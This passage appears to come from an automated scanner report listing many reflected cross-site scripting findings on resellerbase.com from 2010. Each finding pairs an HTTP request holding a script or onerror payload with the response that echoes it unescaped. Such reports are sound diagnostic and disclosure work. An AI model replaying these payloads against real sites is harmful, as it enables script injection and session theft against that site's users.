This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/webcam74a2a</title><img%20src%3da%20onerror%3dalert(1)>31a8c2c9e54d8318e?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/webcam
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:59:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9818

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: webcam74a2a</title><img src=a onerror=alert(1)>31a8c2c9e54d8318e</title>
...[SNIP]...

2.4682. http://www.resellerbase.com/tag/webcam [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/webcam

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e9ca0<img%20src%3da%20onerror%3dalert(1)>074a7c75d7515865e was submitted in the REST URL parameter 2. This input was echoed as e9ca0<img src=a onerror=alert(1)>074a7c75d7515865e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/webcame9ca0<img%20src%3da%20onerror%3dalert(1)>074a7c75d7515865e?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/webcam
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:59:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: webca
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : webcame9ca0<img src=a onerror=alert(1)>074a7c75d7515865e]</td>
...[SNIP]...

2.4683. http://www.resellerbase.com/tag/webcam [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/webcam

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7773c<img%20src%3da%20onerror%3dalert(1)>4be10d12c5f was submitted in the REST URL parameter 2. This input was echoed as 7773c<img src=a onerror=alert(1)>4be10d12c5f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/webcam7773c<img%20src%3da%20onerror%3dalert(1)>4be10d12c5f HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/37/neondollars-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:57:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9790

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: webca
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : webcam7773c<img src=a onerror=alert(1)>4be10d12c5f]</td>
...[SNIP]...

2.4684. http://www.resellerbase.com/tag/webcam [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/webcam

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 8e4fb</title><img%20src%3da%20onerror%3dalert(1)>b90a1357dcb was submitted in the REST URL parameter 2. This input was echoed as 8e4fb</title><img src=a onerror=alert(1)>b90a1357dcb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/webcam8e4fb</title><img%20src%3da%20onerror%3dalert(1)>b90a1357dcb HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/37/neondollars-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:58:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9806

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: webcam8e4fb</title><img src=a onerror=alert(1)>b90a1357dcb</title>
...[SNIP]...

2.4685. http://www.resellerbase.com/tag/webhosting [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/webhosting

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 49671<script>alert(1)</script>4ecee10a930 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag49671<script>alert(1)</script>4ecee10a930/webhosting HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/45/dograecorp.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:58:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag49671<script>alert(1)</script>4ecee10a930/webhosting was not found on this server.</p>
...[SNIP]...

2.4686. http://www.resellerbase.com/tag/website+monitoring [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/website+monitoring

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d1167<script>alert(1)</script>57ecdccb081 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tagd1167<script>alert(1)</script>57ecdccb081/website+monitoring HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/7/proxyonline-info-website-monitoring.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:59:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tagd1167<script>alert(1)</script>57ecdccb081/website+monitoring was not found on this server.</p>
...[SNIP]...

2.4687. http://www.resellerbase.com/tag/white+label [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/white+label

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 98efb<script>alert(1)</script>a3113a118e4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag98efb<script>alert(1)</script>a3113a118e4/white+label HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/38/whitelabelcash-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:58:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag98efb<script>alert(1)</script>a3113a118e4/white+label was not found on this server.</p>
...[SNIP]...

2.4688. http://www.resellerbase.com/tag/white+label [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/white+label

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 84f1c<script>alert(1)</script>72f921e512b64a7b5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag84f1c<script>alert(1)</script>72f921e512b64a7b5/white+label?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/white+label
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:59:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag84f1c<script>alert(1)</script>72f921e512b64a7b5/white+label?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.4689. http://www.resellerbase.com/tag/white+label [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/white+label

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload a26ff</title><img%20src%3da%20onerror%3dalert(1)>d8a81842b87a9a45b was submitted in the REST URL parameter 2. This input was echoed as a26ff</title><img src=a onerror=alert(1)>d8a81842b87a9a45b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/white+labela26ff</title><img%20src%3da%20onerror%3dalert(1)>d8a81842b87a9a45b?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/white+label
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:00:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9828

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: white labela26ff</title><img src=a onerror=alert(1)>d8a81842b87a9a45b</title>
...[SNIP]...

2.4690. http://www.resellerbase.com/tag/white+label [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/white+label

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 45540<img%20src%3da%20onerror%3dalert(1)>d02643264bf was submitted in the REST URL parameter 2. This input was echoed as 45540<img src=a onerror=alert(1)>d02643264bf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/white+label45540<img%20src%3da%20onerror%3dalert(1)>d02643264bf HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/38/whitelabelcash-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:58:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9800

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: white
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : white label45540<img src=a onerror=alert(1)>d02643264bf]</td>
...[SNIP]...

2.4691. http://www.resellerbase.com/tag/white+label [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/white+label

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 38e8f<img%20src%3da%20onerror%3dalert(1)>9529f3a70e1a96ce6 was submitted in the REST URL parameter 2. This input was echoed as 38e8f<img src=a onerror=alert(1)>9529f3a70e1a96ce6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/white+label38e8f<img%20src%3da%20onerror%3dalert(1)>9529f3a70e1a96ce6?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/white+label
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:59:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9812

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: white
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : white label38e8f<img src=a onerror=alert(1)>9529f3a70e1a96ce6]</td>
...[SNIP]...

2.4692. http://www.resellerbase.com/tag/white+label [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/white+label

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 67325</title><img%20src%3da%20onerror%3dalert(1)>48c81d53ebd was submitted in the REST URL parameter 2. This input was echoed as 67325</title><img src=a onerror=alert(1)>48c81d53ebd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/white+label67325</title><img%20src%3da%20onerror%3dalert(1)>48c81d53ebd HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/38/whitelabelcash-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:58:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9816

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: white label67325</title><img src=a onerror=alert(1)>48c81d53ebd</title>
...[SNIP]...

2.4693. http://www.resellerbase.com/tags.php [&ltr parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tags.php

Issue detail

The value of the &ltr request parameter is copied into the HTML document as plain text between tags. The payload f3665<img%20src%3da%20onerror%3dalert(1)>ede49067044 was submitted in the &ltr parameter. This input was echoed as f3665<img src=a onerror=alert(1)>ede49067044 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tags.php?&ltr=f3665<img%20src%3da%20onerror%3dalert(1)>ede49067044 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 21:27:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10664

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Tag Clouds [f3665<im
...[SNIP]...
<b>Tag Clouds [F3665<IMG SRC=A ONERROR=ALERT(1)>EDE49067044]</b>
...[SNIP]...

2.4694. http://www.resellerbase.com/tags.php [&ltr parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tags.php

Issue detail

The value of the &ltr request parameter is copied into the HTML document as text between TITLE tags. The payload 37f32</title><img%20src%3da%20onerror%3dalert(1)>ba9e9ab8db8 was submitted in the &ltr parameter. This input was echoed as 37f32</title><img src=a onerror=alert(1)>ba9e9ab8db8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tags.php?&ltr=37f32</title><img%20src%3da%20onerror%3dalert(1)>ba9e9ab8db8 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 21:27:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10688

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Tag Clouds [37f32</title><img src=a onerror=alert(1)>ba9e9ab8db8]</title>
...[SNIP]...

2.4695. http://www.resellerbase.com/tags.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tags.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d6917<script>alert(1)</script>388affacfd6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tags.phpd6917<script>alert(1)</script>388affacfd6 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:28:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tags.phpd6917<script>alert(1)</script>388affacfd6 was not found on this server.</p>
...[SNIP]...

2.4696. http://www.resellerbase.com/tags.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tags.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91caa"><script>alert(1)</script>a2491f7ccf1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tags.php?91caa"><script>alert(1)</script>a2491f7ccf1=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 21:27:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 12222

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Tag Clouds [ALL]</ti
...[SNIP]...
<a href="/tags.php?91caa"><script>alert(1)</script>a2491f7ccf1=1&ltr=%23">
...[SNIP]...

2.4697. http://www.resellerbase.com/tags.php&ltr=# [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tags.php&ltr=#

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2559f<script>alert(1)</script>9fcbaa50d47 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tags.php2559f<script>alert(1)</script>9fcbaa50d47&ltr=# HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tags.php
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:12:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tags.php2559f<script>alert(1)</script>9fcbaa50d47&ltr=# was not found on this server.</p>
...[SNIP]...

2.4698. http://www.resellerbase.com/tags.php&ltr=# [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tags.php&ltr=#

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload f2385<script>alert(1)</script>e04aded429b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tags.php&ltr=#?f2385<script>alert(1)</script>e04aded429b=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tags.php
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:11:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tags.php&ltr=#?f2385<script>alert(1)</script>e04aded429b=1 was not found on this server.</p>
...[SNIP]...

2.4699. http://www.resellerbase.com/tags.php&ltr=A [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tags.php&ltr=A

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload fa4c9<script>alert(1)</script>b81e8f86675 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tags.phpfa4c9<script>alert(1)</script>b81e8f86675&ltr=A HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tags.php
